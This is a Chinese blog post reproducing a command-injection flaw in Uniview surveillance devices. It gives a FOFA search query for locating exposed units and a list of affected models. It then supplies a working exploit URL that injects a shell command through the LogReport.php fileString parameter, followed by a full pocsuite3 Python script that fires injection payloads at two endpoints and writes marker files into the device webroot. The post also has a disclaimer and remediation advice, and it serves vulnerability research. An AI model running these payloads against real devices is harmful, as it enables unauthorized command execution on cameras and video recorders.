• 浙江宇视科技 LogReport.php 命令执行漏洞复现


    声明

    本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。


    一、漏洞简介

    该漏洞的产生,是由于 /Interface/LogReport/LogReport.php 页面的 fileString 参数未经严格过滤即被拼接进系统命令,导致攻击者可通过该参数注入并执行任意命令。

    FOFA Dork:title=="ISC2500-S"

    二、影响设备型号

    ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308_HF_E ECR3308-HF-E ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E

    三、EXP

    /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo Norah C.IV > /usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/12.php %23"

    其中 `x;` 用于截断原始命令,`%23`(即 `#`)将其后的内容注释掉;命令执行成功后,访问 /Interface/DevManage/12.php 即可看到写入的字符串 Norah C.IV。注意该验证方式会在设备 webroot 中留下 12.php 文件,测试完成后应自行清理。

     该命令执行漏洞,与https://www.cnblogs.com/charon1937/p/14076819.html出自同一批设备,只是漏洞的触发点略有不同。

    四、Python脚本

    #!/usr/bin/env python3.8
    # _*_ coding: utf-8 _*_
    import sys
    import requests

    from pocsuite3.api import POCBase, Output, register_poc, POC_CATEGORY, VUL_TYPE, VULNERABILITY_LEVEL
    from libs.Logger import Logger
    from pathlib import Path

    # Log file path: the directory the script was launched from, joined with
    # this module's own file name (same layout the Logger calls below expect).
    file_name = Path(__file__).name
    path = sys.path[0]
    log_path = f"{path}/{file_name}"


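    class DemoPOC(POCBase):
        """pocsuite3 POC for the Uniview (浙江宇视) DVR/NVR command-execution bugs.

        Two injection points are probed in sequence (see camera_uniview_dvr_rce
        and log_report_rce): the DNSServerAdrr parameter of
        /Interface/DevManage/VM.php and the fileString parameter of
        /Interface/LogReport/LogReport.php. The target is reported as vulnerable
        if either probe writes and reads back its marker file.
        """
        vulID = 'wooyun-2016-0182299'
        version = '1'
        author = ['hy']
        vulDate = '2016-06-09'
        createDate = '2020-11-23'
        updateDate = '2020-11-23'
        references = ['https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0182299']
        name = '浙江宇视科技监控设备命令执行'
        appPowerLink = 'http://www.uniview.com/'
        appName = 'uniview'
        appVersion = '''
    ECR3316_HF、ECR3316-HF、ECR3308_HF、ECR3308-HF、ISC3500E、ISC3500E、ISC3500S、ISC3500S、ECR3316_HF_E、
    ECR3316-HF-E、ECR3308_HF_E、ECR3308-HF-E、ECR3316_HF_S、ECR3316-HF-S、ECR3308_HF_S、ECR3308-HF-S、ISC3500_ET、
    ISC3500-ET、ISC3500_EL、ISC3500-EL、ISC3500_ST、ISC3500-ST、ISC3500_SL、ISC3500-SL、ECR2104_HF、ECR2104-HF、ECR2108_HF、
    ECR2108-HF、ISC2500_SP、ISC2500-SP、ISC2500_EP、ISC2500-EP、ISC2500_E、ISC2500-E、ISC2500_S、ISC2500-S、ISC2500_L、
    ISC2500-L、ECR3308_HF_SC、ECR3308-HF-SC、ECR3316_HF_SC、ECR3316-HF-SC、ISC3500_LC、ISC3500-LC、ISC3500_SC、ISC3500-SC、
    ISC3500_EC、ISC3500-EC、ISC5000-E'''
        vulType = VUL_TYPE.CODE_EXECUTION
        desc = '''
    1.浙江宇视科技uniview视频监控系统/Interface/DevManage/VM.php页面DNSServerAdrr参数过滤不严,导致可以构造恶意的代码,执行系统命令。
    2./Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令'''
        samples = ['']
        install_requires = ['']
        category = POC_CATEGORY.TOOLS.CRACK
        # NOTE(review): the probes are plain HTTP GETs; PROTOCOL.SOCKET is kept
        # as-is because it is only framework metadata here — confirm intent.
        protocol = POC_CATEGORY.PROTOCOL.SOCKET
        vulnerability_level = VULNERABILITY_LEVEL.SERIOUS  # severity rating
        repair_opinion = '''联系厂商,升级应用的版本。厂商链接:https://cn.uniview.com/'''

        def _verify(self):
            """Run both probes against rhost:rport and return a pocsuite3 Output.

            Returns:
                Output: success with HOST/Port details when either probe confirms
                command execution, otherwise a failure Output. The original code
                returned None on the negative path, which is not what the
                framework expects from _verify; both paths now go through
                parse_attack.
            """
            result = {}
            host = self.getg_option("rhost")
            port = self.getg_option("rport") or 80
            nvr_dvr_flag = False
            log_report_flag = False

            if camera_uniview_dvr_rce(host, port, nvr_dvr_flag, log_report_flag):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['HOST'] = host
                result['VerifyInfo']['Port'] = port
                Logger.info('{}:{}存在浙江宇视科技监控设备命令执行漏洞'.format(host, port), log_path)
            else:
                Logger.info('{}:{}不存在浙江宇视科技监控设备命令执行漏洞'.format(host, port), log_path)
            # Always hand an Output back to the framework, even on a miss.
            return self.parse_attack(result)

        def _attack(self):
            """Attack mode is identical to verify: the probes already execute commands."""
            return self._verify()

        def parse_attack(self, result):
            """Wrap a result dict in an Output: success if non-empty, fail otherwise."""
            output = Output(self)

            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')

            return output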


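    def camera_uniview_dvr_rce(host, port, nvr_dvr_flag, log_report_flag) -> bool:
        """Probe the VM.php DNSServerAdrr injection, then chain into log_report_rce.

        The probe injects a shell command that writes a fixed marker into
        /Interface/DevManage/hit.txt under the device webroot, then fetches that
        file back over HTTP. Note that nothing here removes hit.txt afterwards —
        the artifact stays on the target until cleaned up manually.

        Args:
            host: target host name or IPv4 address (no scheme).
            port: target HTTP port; formatted with str() so int or str both work.
            nvr_dvr_flag: incoming result for this probe; set to True on a hit.
            log_report_flag: passed through unchanged to log_report_rce.

        Returns:
            bool: True if this probe or the LogReport probe confirms execution.
        """
        Logger.debug('正在检测{}:{}是否存在浙江宇视科技安防(DVR/NVR)等监控设备命令执行漏洞'.format(host, port), log_path)
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) "
                          "Version/5.1 Safari/534.50"
        }
        nvr_dvr_payload = ('/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" |echo "81dc9bdb52d04dc20036dbd831'
                           '3ed055" >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/hit.txt %23"')
        nvr_dvr_vulnurl = 'http://' + host + ':' + str(port) + nvr_dvr_payload

        try:
            requests.get(nvr_dvr_vulnurl, headers=headers, timeout=10, verify=False)
            nvr_dvr_cmdurl = 'http://' + host + ':' + str(port) + "/Interface/DevManage/hit.txt"
            nvr_dvr_req = requests.get(nvr_dvr_cmdurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in nvr_dvr_req.text:
                nvr_dvr_flag = True
        except requests.RequestException as e:
            # A network/HTTP failure on this probe must not abort the second one.
            Logger.error('%s' % e, log_path)
        # Return outside the try: a `return` inside `finally` would also swallow
        # KeyboardInterrupt/SystemExit and any exception raised in the handler.
        return log_report_rce(host, port, nvr_dvr_flag, log_report_flag)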


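    def log_report_rce(host, port, nvr_dvr_flag, log_report_flag) -> bool:
        """Probe the LogReport.php fileString injection and combine both results.

        The payload terminates the original command with `x;`, echoes the marker
        "Norah C.IV" into /Interface/DevManage/12.php under the webroot and
        comments out the remainder with %23 (`#`). The marker is then fetched
        back over HTTP. As with hit.txt, the dropped 12.php is never removed by
        this script.

        Args:
            host: target host name or IPv4 address (no scheme).
            port: target HTTP port; formatted with str().
            nvr_dvr_flag: result of the VM.php probe, passed through to check_vuln.
            log_report_flag: incoming result for this probe; set to True on a hit.

        Returns:
            bool: check_vuln(nvr_dvr_flag, log_report_flag).
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) "
                          "Version/5.1 Safari/534.50"
        }
        # The raw space before `>` is left as in the original payload; requests
        # percent-encodes it on send, so the URL matches the pre-encoded form.
        log_report_payload = ('/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20Norah%20C.'
                              'IV%20 >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/12.php%20%23"')
        log_report_vulnurl = 'http://' + host + ':' + str(port) + log_report_payload

        Logger.debug('正在检测{}:{}是否存在浙江宇视科技 /Interface/LogReport/LogReport.php 命令执行漏洞'.format(host, port),
                     log_path)
        try:
            requests.get(log_report_vulnurl, headers=headers, timeout=10, verify=False)
            log_report_cmdurl = 'http://' + host + ':' + str(port) + "/Interface/DevManage/12.php"
            log_report_req = requests.get(log_report_cmdurl, headers=headers, timeout=10, verify=False)
            if r"Norah C.IV" in log_report_req.text:
                log_report_flag = True
        except requests.RequestException as e:
            # Log and fall through so the VM.php result is still reported.
            Logger.error('%s' % e, log_path)
        # Return outside the try (no `return` in `finally`): see camera_uniview_dvr_rce.
        return check_vuln(nvr_dvr_flag, log_report_flag)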


    def check_vuln(nvr_dvr_flag: bool, log_report_flag: bool) -> bool:
        """Return True when at least one of the two probes confirmed execution."""
        return bool(nvr_dvr_flag or log_report_flag)


    # Register the POC class with pocsuite3 so the framework can load it.
    register_poc(DemoPOC)

    此为本人及所在安全实验室,结合pocsuite3框架,并对框架进行二次开发后,编写完成的符合自身所需的POC脚本。无法直接对项目进行漏洞检测,若有需要,可提取POC脚本中关键代码。

    五、修复意见

    升级至厂商发布的修复版本。在修复前,应避免将设备的 Web 管理接口直接暴露在公网(本文的 FOFA 语法即可检索到此类暴露资产),并检查 webroot 的 /Interface/DevManage/ 目录下是否已存在 hit.txt、12.php 等被写入的文件,以判断设备是否已被他人利用。

    六、参考文献

    https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=1823

  • 原文地址:https://www.cnblogs.com/charon1937/p/14076959.html